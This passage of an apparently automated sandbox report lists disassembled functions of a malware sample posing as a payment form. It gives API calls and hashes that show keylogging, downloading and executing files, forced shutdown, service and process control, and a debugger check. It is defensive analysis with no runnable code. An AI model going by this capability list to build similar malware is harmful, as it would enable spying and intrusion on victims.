                                              • Opcode ID: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                                              • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                                              • Opcode Fuzzy Hash: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                                              • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                                              Function 00415C90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                              • GetLastError.KERNEL32 ref: 00415CDB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                              • String ID: SeShutdownPrivilege
                                              • API String ID: 3534403312-3733053543
                                              • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                              • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
                                              • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                              • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
                                              Function 0040838E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00408393
                                                • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                                                • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                                                • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                                                • Part of subcall function 00404E06: CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                                              • FindClose.KERNEL32(00000000), ref: 004086F4
                                                • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                                                • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                              • String ID:
                                              • API String ID: 1824512719-0
                                              • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                              • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                                              • Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                              • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                                              Function 00409468 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 0040949C
                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                              • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                              • GetKeyState.USER32(00000010), ref: 004094B8
                                              • GetKeyboardState.USER32(?), ref: 004094C5
                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                              • String ID:
                                              • API String ID: 3566172867-0
                                              • Opcode ID: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                                              • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                                              • Opcode Fuzzy Hash: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                                              • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                                              Function 00418A00 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                              • String ID:
                                              • API String ID: 276877138-0
                                              • Opcode ID: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                                              • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                                              • Opcode Fuzzy Hash: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                                              • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                                              Function 00417AAB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                                                • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Find$CreateFirstNext
                                              • String ID: H"G$`'G$`'G
                                              • API String ID: 341183262-2774397156
                                              • Opcode ID: b2b98a85e42a5e25b8d8df914ace169e7dea3eb2b57226519a309318ff185eb1
                                              • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                                              • Opcode Fuzzy Hash: b2b98a85e42a5e25b8d8df914ace169e7dea3eb2b57226519a309318ff185eb1
                                              • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                                              Function 00414DB4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                                • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                                • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                                • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                                • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                                              • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                              • String ID: PowrProf.dll$SetSuspendState
                                              • API String ID: 1589313981-1420736420
                                              • Opcode ID: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
                                              • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
                                              • Opcode Fuzzy Hash: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
                                              • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
                                              Function 0044F61C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
                                              • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID: ACP$OCP
                                              • API String ID: 2299586839-711371036
                                              • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                              • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                                              • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                              • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                                              Function 0040A0B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                              • wsprintfW.USER32 ref: 0040A13F
                                                • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EventLocalTimewsprintf
                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                              • API String ID: 1497725170-248792730
                                              • Opcode ID: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                                              • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                                              • Opcode Fuzzy Hash: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                                              • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                                              Function 00419493 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                                              • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                                              • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                                              • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Resource$FindLoadLockSizeof
                                              • String ID: SETTINGS
                                              • API String ID: 3473537107-594951305
                                              • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                              • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                                              • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                              • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                                              Function 004087A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004087A5
                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstH_prologNext
                                              • String ID:
                                              • API String ID: 1157919129-0
                                              • Opcode ID: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                                              • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                                              • Opcode Fuzzy Hash: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                                              • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                                              Function 0044F7F0 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
                                              • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                                              • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                                              • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                              • String ID:
                                              • API String ID: 745075371-0
                                              • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                              • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                                              • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                              • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                                              Function 00407848 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040784D
                                              • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                              • String ID:
                                              • API String ID: 1771804793-0
                                              • Opcode ID: 8b98739df08d21036de8d33c5a7c26d000b352d575a1c71d3484f628783436d2
                                              • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                                              • Opcode Fuzzy Hash: 8b98739df08d21036de8d33c5a7c26d000b352d575a1c71d3484f628783436d2
                                              • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                                              Function 0040E2E7 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                                              • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                                                • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                                                • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 1735047541-0
                                              • Opcode ID: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                                              • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
                                              • Opcode Fuzzy Hash: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                                              • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
                                              Function 00443700 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: A%E$A%E
                                              • API String ID: 0-137320553
                                              • Opcode ID: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                                              • Instruction ID: 1c47d48333aa2aee23a91f6ecd96940ee01f0d1a5fc0d697d822b355cdd05c70
                                              • Opcode Fuzzy Hash: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                                              • Instruction Fuzzy Hash: C4022E71E002199BEF14CFA9C8806AEF7F1EF88715F25816AE819E7341D735AE45CB84
                                              Function 004063C6 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DownloadExecuteFileShell
                                              • String ID: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe$open
                                              • API String ID: 2825088817-2300244729
                                              • Opcode ID: dd67746f572dbe597ac0acb568844c3d49b93277ef052445c6133162b0596528
                                              • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
                                              • Opcode Fuzzy Hash: dd67746f572dbe597ac0acb568844c3d49b93277ef052445c6133162b0596528
                                              • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
                                              Function 0041A76C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                              Download Yara Rule
                                              APIs
                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                                                • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
                                                • Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
                                                • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateInfoParametersSystemValue
                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                              • API String ID: 4127273184-3576401099
                                              • Opcode ID: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                                              • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
                                              • Opcode Fuzzy Hash: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                                              • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
                                              Function 0044EEB8 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
                                              • _wcschr.LIBVCRUNTIME ref: 0044F02A
                                              • _wcschr.LIBVCRUNTIME ref: 0044F038
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                              • String ID:
                                              • API String ID: 4212172061-0
                                              • Opcode ID: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                                              • Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
                                              • Opcode Fuzzy Hash: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                                              • Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769
                                              Function 0044F2A3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                              • String ID:
                                              • API String ID: 2829624132-0
                                              • Opcode ID: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                                              • Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
                                              • Opcode Fuzzy Hash: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                                              • Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58
                                              Function 004398AC Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 004399A4
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
